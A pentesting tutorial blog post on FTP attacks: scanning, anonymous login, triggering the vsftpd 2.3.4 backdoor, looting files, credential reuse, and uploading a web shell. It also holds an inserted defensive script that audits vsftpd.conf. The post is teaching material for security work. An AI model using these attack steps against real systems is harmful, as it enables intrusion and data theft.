Breaking into FTP: A Pentester’s Guide to Enumeration and Exploitation
FTP (File Transfer Protocol) is one of those legacy services that still shows up in networks more often than you’d think. And when it does, it often comes with bad configurations and juicy missteps. This post walks you through exploiting FTP from discovery to post-exploitation, with all the tools and commands you’ll want in your arsenal.
1. What is FTP and Why It Matters
FTP (File Transfer Protocol) is a standard protocol used to transfer files between systems over a TCP/IP network. It runs on:
- Port 21: Command/control (plaintext credentials unless secured with SSL/TLS)
- Port 20: Data transfer in active mode (in passive mode the server uses a negotiated high port instead)
⚠ Common Issues:
- Anonymous login enabled
- Writable directories
- Credentials exposed in plain text
- Legacy servers (e.g., vsftpd 2.3.4 backdoor)
- Weak or default credentials
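As an added example (not part of the original post or of vsftpd itself), the anonymous-login, writable-directory and plaintext-credential issues above can be checked from the server side by auditing vsftpd.conf. It assumes the server is vsftpd and applies the defaults documented in vsftpd.conf(5); the sample configs are constructed.

```python
# Added example: audit vsftpd.conf text for the misconfigurations listed above.
# DEFAULTS are the documented vsftpd.conf(5) defaults; confirm against your build.
DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_other_write_enable": "NO",
    "ssl_enable": "NO",
    "force_local_logins_ssl": "YES",
}

def parse_conf(text):
    """Return effective boolean settings: defaults overridden by option=value lines."""
    conf = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().upper()
    return {k: v == "YES" for k, v in conf.items() if k in DEFAULTS}

def audit(text):
    """Return a list of finding strings for risky settings."""
    c = parse_conf(text)
    findings = []
    if c["anonymous_enable"]:
        findings.append("anonymous login enabled")
        # Anonymous writes need write_enable plus at least one anon_* write option.
        anon_write = [k for k in ("anon_upload_enable", "anon_mkdir_write_enable",
                                  "anon_other_write_enable") if c[k]]
        if c["write_enable"] and anon_write:
            findings.append("anonymous write access: " + ", ".join(anon_write))
    if not c["ssl_enable"]:
        findings.append("credentials sent in plaintext (ssl_enable=NO)")
    elif not c["force_local_logins_ssl"]:
        findings.append("TLS optional for logins (force_local_logins_ssl=NO)")
    return findings

# Constructed sample configs, not taken from any real server.
WEAK = "# constructed sample\nanonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\n"
HARDENED = "anonymous_enable=NO\nwrite_enable=YES\nssl_enable=YES\nforce_local_logins_ssl=YES\n"

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(text) or "no findings")
```

An empty config is also flagged, because the documented default for anonymous_enable is YES and for ssl_enable is NO.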
2. Scanning for FTP
Nmap
nmap -p21 -sV --script=ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor <target>
This command checks for:
- Anonymous access
- FTP bounce vulnerability
- Backdoored vsftpd versions
- FTP banner & system info
RustScan
rustscan -a <target> -- -sV -sC -p 21
Quickly identifies FTP alongside other open ports.
3. FTP Enumeration
Once you’ve confirmed FTP is open, it’s time to dig deeper.
ftp (interactive CLI)
ftp <target>
- Test anonymous login:
Name: anonymous
Password: anonymous@domain.com
- Use ls, get, put to interact with the file system.
smbclient-style access via wget or curl
If directory listing is enabled:
wget ftp://anonymous:anonymous@<target>/
Or:
curl ftp://anonymous:anonymous@<target>/
Nmap Scripts
nmap --script=ftp-* -p21 <target>
Use this to gather version info, check for write access, test for vulnerabilities, etc.
Metasploit Enumeration
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
These are handy for automating checks across multiple hosts.
4. FTP Exploitation Techniques
Here’s where we take advantage of poor FTP setups.
Anonymous Login
If the server allows anonymous access, treat it like a public file share:
- Look for downloadable config files, database dumps, backups, etc.
- Check for upload/write access (try put payload.exe).
vsftpd 2.3.4 Backdoor
This infamous version opens a shell on port 6200 if you use :) in the username.
ftp <target>
Name: user:)
Then connect to:
nc <target> 6200
FTP Write + LFI (Local File Inclusion)
If the server allows uploads and the web server includes files based on user input, you may be able to plant a malicious PHP file via FTP and trigger RCE through LFI.
Credential Reuse
If you capture FTP creds, try reusing them on:
- SMB shares
- SSH logins
- Web logins
FTP Bounce Attack
Rare but still worth checking:
nmap -p 21 --script=ftp-bounce <target>
If vulnerable, you can scan internal network hosts via the FTP server.
5. Post-Exploitation
If you’ve got access, here’s what to do next.
Loot the Server
Download files:
ftp <target>
get sensitive.txt
Or:
wget ftp://user:pass@<target>/backup.zip
Upload Web Shells or Payloads
If upload is allowed:
put shell.php
Follow that up by accessing it in a browser if served via HTTP:
http://<target>/uploads/shell.php
Trigger Execution
- Combine with LFI or misconfigured web server to trigger uploaded payloads.
- Use a reverse shell if you can execute files via another exposed service.
TryHackMe Rooms for FTP Practice
- Ignite – Exploit anonymous FTP upload.
- Blue – Also features FTP enumeration.
- Mr Robot – FTP and LFI combined.
- Linux Fundamentals 2 – FTP basics.
Wrap-Up
FTP might be old, but it’s still full of holes. Whether it’s anonymous login, write permissions, or vulnerable software, FTP often gives pentesters an easy win if you’re thorough with enumeration and creative with exploitation.
It’s also an entry point that leads to bigger things—like planting web shells or collecting credentials to reuse elsewhere.
